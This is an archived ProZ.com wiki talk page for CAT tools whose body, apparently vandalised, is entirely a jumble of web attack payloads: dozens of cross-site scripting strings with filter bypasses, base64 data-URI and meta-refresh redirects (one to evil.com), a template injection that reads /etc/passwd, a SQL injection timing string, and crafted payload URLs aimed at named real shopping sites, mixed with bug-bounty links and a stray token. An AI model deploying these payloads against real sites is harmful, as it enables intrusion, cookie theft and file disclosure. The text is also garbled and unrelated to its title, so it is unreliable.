This wiki has been archived. The articles are no longer editable.

Category talk:CAT tools

From ProZ.com Wiki

Jump to: navigation, search

"></img><img src=x onerror=confirm(/Xss-By-Arafat/)>/ </textarea><ScRiPt>prompt(/920065/)</ScRiPt// "><iframe/onload=alert(document.domain)// "><iframe/src=javascript%26colon;[document.domain].find(alert)> <vipin oncopy =prompt(document.domain)> " ="" '><svg onload=setInterval`prompt\x28document.domain\x29` Template loop detected: Template:Constructor.constructor('alert(1)')() <?='<SCRIPT>alert("XSS")</SCRIPT>'?> <--`</a></script></svg><img src="`" onerror="alert(1)"> --!> https://bitsrc.io/ 

<a href=javascript:alert(1)>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
qwe<details open ontoggle=alert.apply(self,[document.domain])>qwe

"--!><svg/onload=prompt(/OPENBUGBOUNTY/)>"

xss"> "/**/autofocus/**/onfocus="alert('XSSPOSED');" "></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt>

print(md5(xss)); set|set&set

</input><input type=``text``//;valaue=`` autofocus onfocus=alert(1) a=``> <img src=1 alt=al lang=ert onerror=top[alt+lang](0)> <script>$=1,alert($)</script> <script Yeasir Arafat>confirm(1)</script Yeasir Arafat> <script>$=1,\u0061lert($)</script> <</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script> <</script/script><script Yeasir Arafat>\u0061lert(1)</script Yeasir Arafat> </style></scRipt><scRipt>alert(1)</scRipt> <img/id="alert&lpar;'XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)> <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)> <svg><x><script>alert('1'&#41</x> <iframe src=""/srcdoc='<svg onload&equals;alert&lpar;1&rpar;>'> Template:7*7"><iframe/onload=alert(document.domain)// <sVg/oNloAd=//><sVg/oNloAd=alert("XSS2")//>@gmail.com

\”}})})-confirm`1`;(function(){({if(){/*/// \”}})})-confirm`1`(a=>{({b:{/*/// \”-confirm`1`// javascript:alert(1);// javascript:alert(document.domain) "onmouseover="prompt(document.domain) h/<\i<script>alert("i");</script> "><marquee><IMG src=x onmouseover=prompt(document.domain);></marquee> https://www.playstation.com/en-us/search/?q=" /><script>alert(1);// ' -confirm(document.domain)-'# "><img/src='1'onerror=alert(1)> "><svg/onload=alert(domain)> "><script>alert('xss')</script> "><img src=x onerror=alert(domain)>@ymail.com "><img src=x onerror=prompt(document.domain)>" "> <img src="x" onerror="prompt(domain)"></img>

  1. "><img src=c onerror=alert(1)>/
  2. //><img src=x><svg/onload=confirm("Xss-By-Arafat")>

</script><video src=x onerror=alert(document.domain)> "></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt> javascript://google.com/?%0aalert(document.domain) <img src=x onerror=prompt(999)> "><img/src=1 onerror=alert(1)> %22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%280%29%3E aaa">fffff</script><script>alert(document.domain)</script>aaaaa "></title><img src=1 onerror=prompt(document.domain)> %27%22%3E%3Cscript%3Ealert%28%27XSS%[email protected]%20%27%2bdocument.domain%29%3C%2fscript%3E

0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg" HTTP-EQUIV="refresh" a="a >> meta tag

0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"


0;data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"HTTP-EQUIV="refresh"

0;http://evil.com"HTTP-EQUIV="refresh"

<input type="text" value="" onmouseover="alert('XSS')">

url=google.com:/onclick='alert(document.domain)'[url=]]xss[/url]

![xss" onload=alert(1);//](a)

javascripT://https://google.com%0aalert(1);//https://google.com

This is an outdated page. You will now be redirected to our new page"); window.location="https://google.com"//

JaVaScRiPT%0a:alert(document.cookie)

<form><button formaction="javascript:alert(123)">xss

{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}

{7*7} Template:7*7

<img/­src=`%00` onerror=this.onerror­=alert(document.cook­i)

<svg/on<script>load=prompt(document.domain);>”/><svg/on<script>load=prompt(document.cookie);>

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">poc</a>


https://google.com\'onmouseover='prompt(1)'

<svg><style><img/src=x onerror=prompt(document.domain)// </br>//["`-->]]>]

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">poc</a>

<img ismap='xxx' itemtype='yyy style=width:100%;height:100%;position:fixed;left:\ 0px;top:0px; onmouseover=alert(/XSS/)//'>

"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>

<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('POST','https://www.facebook.com',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>

<sCrIpt>alert(1)</ScRipt> <script x> <script x>alert('XSS')<script y> <img src='1' onerror='alert(0)' <

String.fromCharCode(88,83,83)

http://localhost/bla.php?test=</script><script>alert(1)</script> <html> 

 <script>
   <?php echo 'foo="text '.$_GET['test'].'";';`?>
 </script>

</html> Bypass quotes in mousedown event

<a href="" onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a>

<script>window['alert'](document['domain'])<script>


alert`1` Bypass onxxxx= blacklist

<object onafterscriptexecute=confirm(0)> <object onbeforescriptexecute=confirm(0)>

<img src='1' onerror\x00=alert(0) /> <img src='1' onerror\x0b=alert(0) />

<img src='1' onerror/=alert(0) />

<img/src='1'/onerror=alert(0)>

<script>alert(x.parentNode.parentNode.parentNode.location)</script>

<script> foo="text </script><script>alert(1)</script>"; </script>


  1. JS/URL polyglot"

data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}

  1. WASM

https://vulnerabledoma.in/polyglot/wasmjscsshtml.html

  1. BlindXSS

'">*/--></title></style></textarea></script%0A><img src=x onerror=confirm(1)>

  1. xss

" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

  1. xss2

';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

  1. xss3

">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> 

  1. sqli

SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/


https://medium.com/@arbazhussain/stored-xss-on-rockstar-game-c008ec18d071 Rules > http://h1.nobbd.de/ http://bugbountyworld.com/ https://medium.com/@phwd https://whitton.io/ https://medium.com/@arbazhussain/10-rules-of-bug-bounty-65082473ab8c

Facebook>> https://web.facebook.com/notes/phwd/facebook-bug-bounties-the-unofficial-treasure-map/1020506894706001?_rdc=1&_rdr https://medium.com/@rajsek/my-3rd-facebook-bounty-hat-trick-chennai-tcs-er-name-listed-in-facebook-hall-of-fame-47f57f2a4f71


& </script><script>alert(document.domain)</script>


https://www.ah.nl/producten/%22%3E%3C/img%3E%3Cimg%20src=x%20onerror=confirm(/Xss-By-Arafat/)%3E/%20%3C/textarea%3E%3CScRiPt%3Eprompt(/920065/)%3C/ScRiPt//%20%22%3E%3Ciframe/onload=alert(document.domain)//%20%22%3E%3Ciframe/src=javascript%26colon;[document.domain].find(alert)%3E%20%3Cvipin%20oncopy%20=prompt(document.domain)%3E

https://www.ah.nl/favorieten/%22%3E%3C/img%3E%3Cimg%20src=x%20onerror=confirm(/Xss-By-Arafat/)%3E/%20%3C/textarea%3E%3CScRiPt%3Eprompt(/920065/)%3C/ScRiPt//%20%22%3E%3Ciframe/onload=alert(document.domain)//%20%22%3E%3Ciframe/src=javascript%26colon;[document.domain].find(alert)%3E%20%3Cvipin%20oncopy%20=prompt(document.domain)%3E

https://www.ah.nl/mijnlijst/%22%3E%3C/img%3E%3Cimg%20src=x%20onerror=confirm(/Xss-By-Arafat/)%3E/%3C/textarea%3E%3CScRiPt%3Eprompt(/920065/)%3C/ScRiPt//%22%3E%3Ciframe/onload=alert(document.domain)//%22%3E%3Ciframe/src=javascript%26colon;[document.domain].find(alert)%3E%3Cvipin%20oncopy%20=prompt(document.domain)%3E

https://www.ah.nl/kies-moment/ophalen-winkel/%22%3E%3C/img%3E%3Cimg%20src=x%20onerror=confirm(/Xss-By-Arafat/)%3E/%20%3C/textarea%3E%3CScRiPt%3Eprompt(/920065/)%3C/ScRiPt//%20%22%3E%3Ciframe/onload=alert(document.domain)//%20%22%3E%3Ciframe/src=javascript%26colon;[document.domain].find(alert)%3E%20%3Cvipin%20oncopy%20=prompt(document.domain)%3E

https://entry.xing-events.com/fastregistration.html

https://analytics.google.com/analytics/web/#/a125856235w184525757p181875971/admin

https://expomanager.xing-events.com/forgotPassword.html?10


3mvdCX86-EB_OoIH6H8zzmv9Of3WmgnOXDuw xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx


http://davenport.net.nz/test.html

Retrieved from "https://wiki.proz.com/wiki/index.php/Category_talk:CAT_tools"